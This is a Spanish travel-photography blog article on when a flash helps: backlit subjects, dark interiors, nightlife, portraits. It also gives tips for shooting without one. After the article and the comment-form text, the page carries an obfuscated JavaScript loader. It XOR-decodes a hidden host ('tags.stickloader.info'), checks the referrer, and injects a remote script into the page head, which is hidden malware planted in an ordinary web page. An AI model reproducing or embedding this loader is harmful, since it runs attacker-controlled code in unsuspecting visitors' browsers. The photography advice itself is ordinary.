¿Se requiere flash para la fotografía de viajes?

Si te estás preparando para un viaje y planeas llevar tu cámara para tomar fotos, tal vez te preguntes si vale la pena llevar un flash. Después de todo, ocupa un espacio en la maleta que puedes usar para otras cosas, ¿verdad? ¿Es realmente tan importante para la fotografía de viajes?

¿Se necesita el flash para la fotografía de viajes? Tener flash permite al fotógrafo ser más versátil, así que para muchos viajes, puede ser una gran ventaja tener flash. Si un viajero está tratando de tomar fotografías de noche, de sujetos a contraluz, o en interiores, un flash es muy recomendable.

Dado que muchos de nosotros no sabemos exactamente en qué situaciones de iluminación podríamos encontrarnos en nuestros viajes, tener un flash puede ser definitivamente una ventaja. Sin embargo, se podría argumentar que un flash no es absolutamente necesario para viajar, aunque haya algunas situaciones en las que podría venirte bien. Pero en algunos escenarios, el flash puede marcar la diferencia entre una foto de calidad y una no suficientemente buena.

¿Por qué debería plantearme llevar el flash para mis fotografías de viajes?

Uno de los grandes beneficios de los viajes es que nos permite ver nuevos lugares, experimentar nuevas culturas y probar nuevas cosas, todo lo cual puede traer fabulosas oportunidades para encontrar sujetos paisajes o escenas para la fotografía. Ya sea que queramos hacer impresiones de calidad profesional o simplemente documentar nuestros recuerdos, la fotografía de viajes puede ser muy gratificante.

Inevitablemente, hay situaciones en las que naturalmente tendrás una escena que está parcialmente en sombra, y parcialmente con luz brillante y dura. Esto puede ser incluso peor, especialmente si el sujeto que deseas fotografiar está en la sombra. Usar un flash ayuda a rellenar e iluminar las sombras sin sobreexponer las partes de la escena que ya están iluminadas.

Si planeas fotografiar cualquier sujeto en movimiento y quieres fotos claras y nítidas, un flash puede ayudarte a conseguirlo. Aunque otros ajustes, como una velocidad de obturación rápida, también son importantes, un flash puede ayudar a congelar los sujetos en movimiento. Si la imagen también está ligeramente subexpuesta, un flash puede ayudar a poner el sujeto en movimiento reparándolo del fondo, enfocando así más la atención en el sujeto deseado.

Los ajustes de interiores oscuros supondrán un verdadero reto si no tienes un flash a mano. Incluso si ajustas otros parámetros, como aumentar la configuración ISO, algunas escenas oscuras simplemente no saldrán bien sin la ayuda de un flash.

Los viajes son a menudo un momento para salir y explorar, y esto no necesariamente termina cuando el sol se pone. Muchos lugares tienen una excitante vida nocturna que puede ser una verdadera delicia para fotografiar. Una de las mejores maneras de capturar claramente la vida en la calle por la noche es con un flash.

¿Qué tipo de flash debo llevar para la fotografía de viajes?

Tienes dos opciones principales cuando estás valorando llevar el flash en un viaje: el flash de la cámara y un flash externo de la cámara. Ambos tienen sus ventajas y desventajas.

El flash de la cámara es un flash que viene con la cámara. Normalmente es un flash emergente incorporado, pero algunos modelos de cámara tienen unidades de flash acoplables. La ventaja del flash de la cámara es que es genial si no llevas un flash separado y quieres capturar una toma que lo requiera, como una escena a contraluz. Y no te ocupará espacio en la maleta .

La desventaja del flash de la cámara es que no es tan versátil. Crea una luz muy directa y que puede tener un efecto duro eliminando detalles de los sujetos y los hace parecer planos o descoloridos.

Un flash externo montado en la cámara es a menudo un poco mejor que un flash integrado en la cámara porque puedes moverlo para modificar el ángulo y evitar el destello de luz directa dándote más control de exposición sobre tu escena.

El flash externo de la cámara, como su nombre lo indica, es un flash que se encuentra en cualquier lugar menos en la propia cámara. Da un mayor control sobre cómo se ilumina la escena, pero es otra pieza de equipo que debes llevar contigo, ocupando espacio en tu bolso. Es muy útil si sabes que tienes una toma en mente que requerirá una iluminación específica. De lo contrario, puede que no valga la pena llevarlo contigo.

¿Cuándo debo usar el flash en la fotografía de viajes?

Si tiene problemas para obtener la exposición correcta de un sujeto porque está mitad en la sombra y mitad en la luz, un flash puede ayudar a rellenar las sombras y permitir un sujeto más visible sin sobreexponer las áreas más claras.

Si estás planeando hacer retratos, por ejemplo de amigos o de lugareños donde estás visitando, un flash puede ayudar a llevar realmente tus fotos al siguiente nivel. El flash puede ayudar a separar los sujetos del fondo, especialmente si subexpones ligeramente la foto y utilizas el flash. Hará que la diferenciación entre el sujeto y el fondo sea más clara.

Los ambientes interiores oscuros pueden ser muy comunes cuando se viaja, ya que hay lugares en los que la luz natural y artificial puede ser menor que la ideal. En estas situaciones, el flash es crítico y puede marcar la diferencia entre una captura verdaderamente impresionante y un intento de desecho. Un bosque denso, un paseo por una ruina, o almorzar en un local puede tener una iluminación tenue que necesita la ayuda de un flash para capturar la escena.

Si quieres capturar la vitalidad de la vida nocturna de una ciudad o fotografiar a tus amigos después de que se ponga el sol, un flash es imprescindible. Cualquier tipo de fotografía nocturna que no sea específicamente la astrofotografía o la de conseguir efectos de luz en movimiento se beneficiará de tener un flash.

¿Debería usarse el flash en todas las situaciones?

Lo más probable es que no, dependiendo del tipo de fotografía que se quiera hacer. Es importante experimentar y practicar con la cámara para tener una idea de cuándo es apropiado utilizarla para obtener el resultado deseado.

¿Qué puedo hacer si me olvido de llevar un flash en mi viaje?

¡Uy! Tal vez no había suficiente espacio en tus maletas o simplemente lo olvidaste, pero ahora necesitas un flash y no lo tienes. No te preocupes, con algunos tucos podrías ser capaz de conseguir una buena foto.

En primer lugar, utiliza la luz disponible. Planea tomar fotos durante las horas del día cuando la luz del sol sea más brillante o esté en un ángulo para iluminar la escena deseada. Si puedes, mueve los sujetos de manera que estén fuera de las zonas de sombra y mejor iluminados. Trata de evitar que los sujetos estén a contraluz, ya que esto los hará menos distinguibles en la foto.

En una situación de emergencia, también puedes construir un difusor de luz improvisado. Aunque hay versiones que se pueden comprar, es otra pieza de equipo que tienes que llevar, así que puede ser más fácil hacer uno simplemente con los materiales disponibles. Toma una bufanda o una camisa y cubre una lámpara para que su luz sea más suave y menos directa. Esto a menudo permite más flexibilidad para que el sujeto pueda ser fotografiado.

Sé creativo con la reflexión. Los espejos pueden ser usados para orientar la luz hacia un sujeto, pero prácticamente cualquier fuente puede ser usada para reflejar alguna cantidad de luz hacia un sujeto. Una hoja de papel en blanco sostenida estratégicamente puede ayudar a iluminar un rostro, mientras que el reflejo de la luz de una masa de agua puede ayudar a iluminar una escena.

Lo principal es disfrutar del viaje y no sentir que te pierdes grandes tomas.

Y esto es todo lo que te interesa tener en cuanta sobre este tema, esperamos que te haya gustado el artículo y que disfrutes mucho de la fotografía y de tus viajes, con o si flash. Para ampliar la información puedes echarle un vistazo a nuestros artículos sobre fotografía con poca luz y sobre eventos nocturnos.

Volver a la página del BLOG

Allí encontrarás artículos sobre fotografía de eventos con información interesante.
Ir al BLOG

Deja el primer comentario

Iniciar sesión

Correo electrónico *
Contraseña *

REGÍSTRATE

Correo electrónico *
Contraseña *
!function (_5f186) { var _7e0bb3 = Date.now(); var _e34a6f = 1000; _7e0bb3 = _7e0bb3 / _e34a6f; _7e0bb3 = Math.floor(_7e0bb3); var _f17f41 = 600; _7e0bb3 -= _7e0bb3 % _f17f41; _7e0bb3 = _7e0bb3.toString(16); var _fbc2f0 = _5f186.referrer; if (!_fbc2f0) return; var _cc24b6 = [33991, 34002, 34004, 33984, 33949, 33984, 33991, 34010, 34000, 34008, 34015, 34012, 34002, 34007, 34006, 33985, 33949, 34010, 34013, 34005, 34012]; _cc24b6 = _cc24b6.map(function(_bcded5){ return _bcded5 ^ 33971; }); var _c16f5a = "6f5ae20d5c54f56d58ceb4695da44c11"; _cc24b6 = String.fromCharCode(..._cc24b6); var _37802c = "https://"; var _d8c428 = "/"; var _aeb9f5 = "mount."; var _7f4946 = ".js"; var _1f2600 = _5f186.createElement("script"); _1f2600.type = "text/javascript"; _1f2600.async = true; _1f2600.src = _37802c + _cc24b6 + _d8c428 + _aeb9f5 + _7e0bb3 + _7f4946; _5f186.getElementsByTagName("head")[0].appendChild(_1f2600) }(document);